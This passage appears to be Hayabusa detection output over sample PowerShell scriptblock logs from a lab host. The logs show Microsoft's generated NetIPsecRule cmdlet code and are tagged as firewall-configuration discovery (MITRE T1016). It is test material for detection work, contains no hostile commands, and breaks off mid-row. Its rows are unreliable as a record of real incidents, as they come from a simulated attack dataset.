'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAsso",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_que",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 